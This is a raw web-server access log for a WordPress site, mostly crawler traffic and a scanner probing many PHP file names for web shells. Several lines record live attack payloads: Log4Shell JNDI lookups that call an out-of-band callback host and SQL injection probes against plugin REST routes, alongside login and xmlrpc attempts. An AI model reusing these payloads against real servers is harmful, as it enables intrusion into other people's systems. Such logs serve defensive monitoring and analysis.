51.79.229.86 - - [18/Oct/2025:10:11:24 -0400] "GET /kakang.php HTTP/1.1" 404 10904 "http://salhab360photos.com/kakang.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:11:25 -0400] "GET /products119036904?kg=0117585317 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:11:29 -0400] "GET /mapel.php HTTP/1.1" 404 10895 "http://salhab360photos.com/mapel.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:11:35 -0400] "GET /products234281380?kg=0231424371 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:11:37 -0400] "GET /ytalfa.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ytalfa.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:11:40 -0400] "GET /products89529978?kg=0088438232 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:11:54 -0400] "GET /ancol.php HTTP/1.1" 404 10905 "http://salhab360photos.com/ancol.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:08 -0400] "GET /itaewon.php HTTP/1.1" 404 10898 "http://salhab360photos.com/itaewon.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:16 -0400] "GET /bio666.php HTTP/1.1" 404 10905 "http://salhab360photos.com/bio666.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:12:17 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:12:22 -0400] "GET /bio66.php HTTP/1.1" 404 10903 "http://salhab360photos.com/bio66.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:31 -0400] "GET /bio000.php HTTP/1.1" 404 10905 "http://salhab360photos.com/bio000.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:42 -0400] "GET /bio00.php HTTP/1.1" 404 10905 "http://salhab360photos.com/bio00.php" "Go-http-client/2.0"
66.249.64.107 - - [18/Oct/2025:10:12:46 -0400] "GET /products12283522?kg=0012133804 HTTP/1.1" 200 29101 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:10:12:45 -0400] "GET /3sa.php HTTP/1.1" 404 10903 "http://salhab360photos.com/3sa.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:51 -0400] "GET /35s4.php HTTP/1.1" 404 10906 "http://salhab360photos.com/35s4.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:53 -0400] "GET /kintil.php HTTP/1.1" 404 10906 "http://salhab360photos.com/kintil.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:12:57 -0400] "GET /puki.php HTTP/1.1" 404 10896 "http://salhab360photos.com/puki.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:01 -0400] "GET /pukimak.php HTTP/1.1" 404 10906 "http://salhab360photos.com/pukimak.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:04 -0400] "GET /omest.php HTTP/1.1" 404 10902 "http://salhab360photos.com/omest.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:08 -0400] "GET /hmei.php HTTP/1.1" 404 10905 "http://salhab360photos.com/hmei.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:12 -0400] "GET /i7.php HTTP/1.1" 404 10899 "http://salhab360photos.com/i7.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:15 -0400] "GET /team7.php HTTP/1.1" 404 10897 "http://salhab360photos.com/team7.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:12:53 -0400] "GET /?x=${jndi:ldap://${:-918}${:-646}.${hostName}.uri.d3pm34ikdbcl3g7iqchgaqnanrf3ae9jm.oast.pro/a} HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:10:12:55 -0400] "GET / HTTP/1.1" 200 4189 "${jndi:ldap://${:-918}${:-646}.${hostName}.referer.d3pm34ikdbcl3g7iqchgf5g4johhnipaq.oast.pro}" "${jndi:ldap://${:-918}${:-646}.${hostName}.useragent.d3pm34ikdbcl3g7iqchgpkk9ousbgcd1n.oast.pro}"
185.61.153.107 - - [18/Oct/2025:10:13:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796794.6953299045562744140625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:13:22 -0400] "GET /konco.php HTTP/1.1" 404 10903 "http://salhab360photos.com/konco.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:29 -0400] "GET /koncol.php HTTP/1.1" 404 10904 "http://salhab360photos.com/koncol.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:32 -0400] "GET /kanjut.php HTTP/1.1" 404 10905 "http://salhab360photos.com/kanjut.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:36 -0400] "GET /kanjutbadag.php HTTP/1.1" 404 10904 "http://salhab360photos.com/kanjutbadag.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:43 -0400] "GET /sempak.php HTTP/1.1" 404 10903 "http://salhab360photos.com/sempak.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:51 -0400] "GET /semvuk.php HTTP/1.1" 404 10897 "http://salhab360photos.com/semvuk.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:58 -0400] "GET /trotoar.php HTTP/1.1" 404 10904 "http://salhab360photos.com/trotoar.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:02 -0400] "GET /uname.php HTTP/1.1" 404 10906 "http://salhab360photos.com/uname.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:07 -0400] "GET /name.php HTTP/1.1" 404 10901 "http://salhab360photos.com/name.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:11 -0400] "GET /unname.php HTTP/1.1" 404 10903 "http://salhab360photos.com/unname.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:14 -0400] "GET /roat.php HTTP/1.1" 404 10900 "http://salhab360photos.com/roat.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:22 -0400] "GET /nigga.php HTTP/1.1" 404 10902 "http://salhab360photos.com/nigga.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:14:24 -0400] "GET /products60911490?kg=0060168748 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:14:35 -0400] "GET /complaints.php HTTP/1.1" 404 10903 "http://salhab360photos.com/complaints.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:44 -0400] "GET /copy.php HTTP/1.1" 404 10903 "http://salhab360photos.com/copy.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:14:55 -0400] "POST /apply.cgi HTTP/1.1" 404 10846 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/7.1.2 Safari/537.85.11"
51.79.229.86 - - [18/Oct/2025:10:14:57 -0400] "GET /remini.php HTTP/1.1" 404 10902 "http://salhab360photos.com/remini.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:13 -0400] "GET /boong.php HTTP/1.1" 404 10899 "http://salhab360photos.com/boong.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:15:34 -0400] "GET /index.php?p=member&destination HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
98.70.29.56 - - [18/Oct/2025:10:15:45 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
51.79.229.86 - - [18/Oct/2025:10:16:01 -0400] "GET /pressf.php HTTP/1.1" 404 10906 "http://salhab360photos.com/pressf.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:13:18 -0400] "GET /tema.php HTTP/1.1" 404 10905 "http://salhab360photos.com/tema.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:13:22 -0400] "GET /products60870818?kg=0060128572 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:13:48 -0400] "GET /sempuk.php HTTP/1.1" 404 10903 "http://salhab360photos.com/sempuk.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:14:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760796854.0781559944152832031250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:14:18 -0400] "GET /pijatplus.php HTTP/1.1" 404 10905 "http://salhab360photos.com/pijatplus.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:29 -0400] "GET /niga.php HTTP/1.1" 404 10904 "http://salhab360photos.com/niga.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:38 -0400] "GET /compress.php HTTP/1.1" 404 10906 "http://salhab360photos.com/compress.php" "Go-http-client/2.0"
34.227.234.246 - - [18/Oct/2025:10:14:38 -0400] "GET /about-me/ HTTP/1.1" 200 16339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:14:40 -0400] "GET /paste.php HTTP/1.1" 404 10903 "http://salhab360photos.com/paste.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:50 -0400] "GET /deleted.php HTTP/1.1" 404 10904 "http://salhab360photos.com/deleted.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:14:53 -0400] "GET /remove.php HTTP/1.1" 404 10899 "http://salhab360photos.com/remove.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:02 -0400] "GET /removed.php HTTP/1.1" 404 10896 "http://salhab360photos.com/removed.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:05 -0400] "GET /move.php HTTP/1.1" 404 10899 "http://salhab360photos.com/move.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:10 -0400] "GET /moved.php HTTP/1.1" 404 10902 "http://salhab360photos.com/moved.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:15:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760796915.8787789344787597656250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:15:17 -0400] "GET /bohong.php HTTP/1.1" 404 10905 "http://salhab360photos.com/bohong.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:15:26 -0400] "GET /products60936296?kg=0060193253 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:15:26 -0400] "GET /poco.php HTTP/1.1" 404 10899 "http://salhab360photos.com/poco.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:36 -0400] "GET /pocong.php HTTP/1.1" 404 10898 "http://salhab360photos.com/pocong.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:15:49 -0400] "GET /press.php HTTP/1.1" 404 10903 "http://salhab360photos.com/press.php" "Go-http-client/2.0"
162.240.155.58 - - [18/Oct/2025:10:15:55 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)"
51.79.229.86 - - [18/Oct/2025:10:15:54 -0400] "GET /pressF.php HTTP/1.1" 404 10899 "http://salhab360photos.com/pressF.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:08 -0400] "GET /roger.php HTTP/1.1" 404 10905 "http://salhab360photos.com/roger.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:16:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760796976.7677500247955322265625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:16:14 -0400] "GET /aji.php HTTP/1.1" 404 10897 "http://salhab360photos.com/aji.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:17 -0400] "GET /anjas.php HTTP/1.1" 404 10902 "http://salhab360photos.com/anjas.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:23 -0400] "GET /anjass.php HTTP/1.1" 404 10905 "http://salhab360photos.com/anjass.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:27 -0400] "GET /fenglao.php HTTP/1.1" 404 10906 "http://salhab360photos.com/fenglao.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:16:28 -0400] "GET /products60929986?kg=0060187020 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:16:32 -0400] "GET /bbc.php HTTP/1.1" 404 10905 "http://salhab360photos.com/bbc.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:35 -0400] "GET /bmw.php HTTP/1.1" 404 10898 "http://salhab360photos.com/bmw.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:40 -0400] "GET /spider.php HTTP/1.1" 404 10905 "http://salhab360photos.com/spider.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:45 -0400] "GET /coko.php HTTP/1.1" 404 10906 "http://salhab360photos.com/coko.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:16:57 -0400] "GET /ccc.php HTTP/1.1" 404 10896 "http://salhab360photos.com/ccc.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:03 -0400] "GET /mendhoan.php HTTP/1.1" 404 10906 "http://salhab360photos.com/mendhoan.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:05 -0400] "GET /mendoan.php HTTP/1.1" 404 10896 "http://salhab360photos.com/mendoan.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:17:10 -0400] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:10:17:11 -0400] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:17:12 -0400] "GET /combo.php HTTP/1.1" 404 10899 "http://salhab360photos.com/combo.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:17 -0400] "GET /cpu.php HTTP/1.1" 404 10905 "http://salhab360photos.com/cpu.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:37 -0400] "GET /clan.php HTTP/1.1" 404 10906 "http://salhab360photos.com/clan.php" "Go-http-client/2.0"
66.249.64.107 - - [18/Oct/2025:10:17:40 -0400] "GET /products122714690?kg=0121218252 HTTP/1.1" 200 29096 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:10:17:40 -0400] "GET /clanx.php HTTP/1.1" 404 10906 "http://salhab360photos.com/clanx.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:17:44 -0400] "GET /products78157480?kg=0077204421 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:17:51 -0400] "GET /blackxr.php HTTP/1.1" 404 10896 "http://salhab360photos.com/blackxr.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:55 -0400] "GET /boi.php HTTP/1.1" 404 10897 "http://salhab360photos.com/boi.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:17:59 -0400] "GET /products34992306?kg=0034565652 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:18:00 -0400] "GET /boss.php HTTP/1.1" 404 10903 "http://salhab360photos.com/boss.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:18:07 -0400] "GET /bos.php HTTP/1.1" 404 10896 "http://salhab360photos.com/bos.php" "Go-http-client/2.0"
162.240.155.58 - - [18/Oct/2025:10:16:04 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)"
51.79.229.86 - - [18/Oct/2025:10:16:12 -0400] "GET /wolf.php HTTP/1.1" 404 10899 "http://salhab360photos.com/wolf.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:10:16:42 -0400] "GET /products113868890?kg=0112480328 HTTP/1.1" 200 29505 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:10:16:48 -0400] "GET /cc.php HTTP/1.1" 404 10896 "http://salhab360photos.com/cc.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:10 -0400] "GET /combro.php HTTP/1.1" 404 10905 "http://salhab360photos.com/combro.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:10:17:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760797035.0734689235687255859375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:17:25 -0400] "GET /clash.php HTTP/1.1" 404 10903 "http://salhab360photos.com/clash.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:28 -0400] "GET /royale.php HTTP/1.1" 404 10905 "http://salhab360photos.com/royale.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:17:31 -0400] "GET /clashroyal.php HTTP/1.1" 404 10903 "http://salhab360photos.com/clashroyal.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:10:17:32 -0400] "GET /products60930260?kg=0060187291 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:10:17:38 -0400] "GET /products3402308?kg=0003360899 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:17:44 -0400] "GET /blackx12.php HTTP/1.1" 404 10906 "http://salhab360photos.com/blackx12.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:17:54 -0400] "GET /products126437932?kg=0124896087 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:10:17:59 -0400] "GET /products122714854?kg=0121218414 HTTP/1.1" 200 28996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.61.153.107 - - [18/Oct/2025:10:18:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760797097.7715730667114257812500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:10:18:13 -0400] "GET /oscar.php HTTP/1.1" 404 10905 "http://salhab360photos.com/oscar.php" "Go-http-client/2.0"
51.79.68.173 - - [18/Oct/2025:10:18:16 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38"
51.79.229.86 - - [18/Oct/2025:10:18:20 -0400] "GET /kimcil.php HTTP/1.1" 404 10896 "http://salhab360photos.com/kimcil.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:18:28 -0400] "GET /products153842824?kg=0151966773 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:10:18:35 -0400] "GET /products60894148?kg=0060151619 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:10:18:40 -0400] "GET /add.php HTTP/1.1" 404 10903 "http://salhab360photos.com/add.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:18:58 -0400] "GET /jones.php HTTP/1.1" 404 10906 "http://salhab360photos.com/jones.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:19:08 -0400] "GET /duo.php HTTP/1.1" 404 10897 "http://salhab360photos.com/duo.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:18:09 -0400] "GET /products50720494?kg=0050102034 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:18:10 -0400] "GET /afk.php HTTP/1.1" 404 10895 "http://salhab360photos.com/afk.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:10:18:18 -0400] "GET /products122714430?kg=0121217994 HTTP/1.1" 200 28936 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:10:18:22 -0400] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:10:18:16 -0400] "GET /products89543144?kg=0088451237 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:18:34 -0400] "GET /odd.php HTTP/1.1" 404 10906 "http://salhab360photos.com/odd.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:18:38 -0400] "GET /products175138548?kg=0173002795 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:18:43 -0400] "GET /products87941442?kg=0086869068 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:18:45 -0400] "GET /plus.php HTTP/1.1" 404 10903 "http://salhab360photos.com/plus.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:18:48 -0400] "GET /products159604230?kg=0157657918 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:18:48 -0400] "GET /tn.jones.php HTTP/1.1" 404 10898 "http://salhab360photos.com/tn.jones.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:18:53 -0400] "GET /tnjones.php HTTP/1.1" 404 10899 "http://salhab360photos.com/tnjones.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:18:53 -0400] "GET /products80904772?kg=0079918211 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:19:00 -0400] "GET /jn.php HTTP/1.1" 404 10897 "http://salhab360photos.com/jn.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:19:03 -0400] "GET /products73848954?kg=0072948440 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:19:04 -0400] "GET /jomblo.php HTTP/1.1" 404 10903 "http://salhab360photos.com/jomblo.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:19:26 -0400] "GET /lc.php HTTP/1.1" 404 10905 "http://salhab360photos.com/lc.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:19:30 -0400] "GET /biduan.php HTTP/1.1" 404 10896 "http://salhab360photos.com/biduan.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:10:19:35 -0400] "GET /shtml.php HTTP/1.1" 404 10906 "http://salhab360photos.com/shtml.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:10:19:36 -0400] "GET /products228348238?kg=0225563586 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:10:19:59 -0400] "GET /products129214124?kg=0127638423 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:10:19:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760797156.9684939384460449218750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:10:19:17 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:10:19:11 -0400] "GET /tnj.php HTTP/1.1" 404 10899 "http://salhab360photos.com/tnj.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:10:19:20 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/619.29 (KHTML, like Gecko) Version/17.0.14 Safari/619.29"
216.73.216.159 - - [18/Oct/2025:10:19:14 -0400] "GET /products203535312?kg=0201053257 HTTP/1.1" 404 9796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:10:19:18 -0400] "GET /sobat.php HTTP/1.1" 404 10899 "http://salhab360photos.com/sobat.php" "Go-http-client/2.0"
